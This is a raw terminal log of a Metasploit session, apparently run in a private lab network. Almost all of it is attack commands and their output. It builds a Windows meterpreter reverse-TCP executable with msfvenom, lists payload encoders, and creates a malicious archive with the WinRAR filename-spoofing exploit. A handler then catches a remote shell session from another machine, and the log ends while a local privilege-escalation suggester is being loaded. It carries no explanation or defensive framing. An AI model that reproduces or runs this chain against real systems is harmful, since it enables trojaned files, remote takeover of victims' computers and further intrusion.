root@root:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.

112
lport=4444 -f exe -o /root/Desktop/sk.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the
payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/sk.exe
root@root:~# msfconsole
[-] ***rting the metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

msf5 > search encoder

Matching Modules
================

# Name Disclosure Date Rank

Check Description
- ---- --------------- ----
----- -----------
1 encoder/cmd/brace low
No Bash Brace Expansion Command Encoder
2 encoder/cmd/echo good
No Echo Command Encoder
3 encoder/cmd/generic_sh manual
No Generic Shell Variable Substitution Command Encoder
4 encoder/cmd/ifs low
No Bourne ${IFS} Substitution Command Encoder
5 encoder/cmd/perl normal
No Perl Command Encoder
6 encoder/cmd/powershell_base64 excellent
No Powershell Base64 Command Encoder
7 encoder/cmd/printf_php_mq manual
No printf(1) via PHP magic_quotes Utility Command Encoder
8 encoder/generic/eicar manual
No The EICAR Encoder
9 encoder/generic/none normal
No The "none" Encoder
 10 encoder/mipsbe/byte_xori normal
No Byte XORi Encoder
11 encoder/mipsbe/longxor normal
No XOR Encoder
12 encoder/mipsle/byte_xori normal
No Byte XORi Encoder
13 encoder/mipsle/longxor normal
No XOR Encoder
14 encoder/php/base64 great
No PHP Base64 Encoder
15 encoder/ppc/longxor normal
No PPC LongXOR Encoder
16 encoder/ppc/longxor_tag normal
No PPC LongXOR Encoder
17 encoder/ruby/base64 great
No Ruby Base64 Encoder
18 encoder/sparc/longxor_tag normal
No SPARC DWORD XOR Encoder
19 encoder/x64/xor normal
No XOR Encoder
20 encoder/x64/xor_dynamic normal
No Dynamic key XOR Encoder
21 encoder/x64/zutto_dekiru manual
No Zutto Dekiru
22 encoder/x86/add_sub manual
No Add/Sub Encoder
23 encoder/x86/alpha_mixed low
No Alpha2 Alphanumeric Mixedcase Encoder
24 encoder/x86/alpha_upper low
No Alpha2 Alphanumeric Uppercase Encoder
25 encoder/x86/avoid_underscore_tolower manual
No Avoid underscore/tolower
26 encoder/x86/avoid_utf8_tolower manual
No Avoid UTF8/tolower
27 encoder/x86/bloxor manual
No BloXor - A Metamorphic Block Based XOR Encoder
28 encoder/x86/bmp_polyglot manual
No BMP Polyglot
29 encoder/x86/call4_dword_xor normal
No Call+4 Dword XOR Encoder
30 encoder/x86/context_cpuid manual
No CPUID-based Context Keyed Payload Encoder
31 encoder/x86/context_stat manual
No stat(2)-based Context Keyed Payload Encoder
32 encoder/x86/context_time manual
No time(2)-based Context Keyed Payload Encoder
33 encoder/x86/countdown normal
No Single-byte XOR Countdown Encoder
34 encoder/x86/fnstenv_mov normal
No Variable-length Fnstenv/mov Dword XOR Encoder
35 encoder/x86/jmp_call_additive normal
No Jump/Call XOR Additive Feedback Encoder
36 encoder/x86/nonalpha low
No Non-Alpha Encoder
37 encoder/x86/nonupper low
No Non-Upper Encoder
38 encoder/x86/opt_sub manual
No Sub Encoder (optimised)
39 encoder/x86/service manual
No Register Service
40encoder/x86/shikata_ga_nai excellent
No Polymorphic XOR Additive Feedback Encoder
41 encoder/x86/single_static_bit manual
No Single Static Bit
42 encoder/x86/unicode_mixed manual
No Alpha2 Alphanumeric Unicode Mixedcase Encoder
43 encoder/x86/unicode_upper manual
No Alpha2 Alphanumeric Unicode Uppercase Encoder
44 encoder/x86/xor_dynamic normal
No Dynamic key XOR Encoder
45 exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal
No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
46 exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great
No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer
Overflow
47 exploit/windows/http/novell_messenger_acceptlang 2006-04-13 average
No Novell Messenger Server 2.0 Accept-Language Overflow

msf5 > search winrar

Matching Modules
================

# Name Disclosure Date Rank

Check Description
- ---- --------------- ----
----- -----------
1 exploit/windows/fileformat/winrar_ace 2019-02-05 excellent
No RARLAB WinRAR ACE Format Input Validation Remote Code Execution
2 exploit/windows/fileformat/winrar_name_spoofing 2009-09-28 excellent
No WinRAR Filename Spoofing

msf5 > Interrupt: use the 'exit' command to quit

msf5 > Interrupt: use the 'exit' command to quit
msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use
exploit/windows/fileformat/winrar_name_spoofing? [y/N] Interrupt: use the 'exit'
command to quit
msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use
exploit/windows/fileformat/winrar_name_spoofing? [y/N] y
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(windows/fileformat/winrar_name_spoofing) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set FILENAME samk.zip
FILENAME => samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > exploit

[*] Creating 'samk.zip' file...

[+] samk.zip stored at /root/.msf4/local/samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST 192.168.0.112 yes The listen address (an interface may be
specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.112:4444

[*] Sending stage (179779 bytes) to 192.168.0.111
[*] Meterpreter session 1 opened (192.168.0.112:4444 -> 192.168.0.111:1849) at
2019-07-26 08:14:50 -0400
[*] Sending stage (179779 bytes) to 192.168.0.111

meterpreter > background

[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

# Name Disclosure Date Rank Check

Description
- ---- --------------- ---- -----
-----------
1 post/multi/recon/local_exploit_suggester normal No
Multi Recon Local Exploit Suggester

msf5 exploit(multi/handler) > post/multi/recon/local_exploit_suggester

[-] Unknown command: post/multi/recon/local_exploit_suggester.
This is a module we can load. Do you want to use
post/multi/recon/local_exploit_suggester? [y/N] y
msf5 post(multi/recon/local_exploit_suggester) >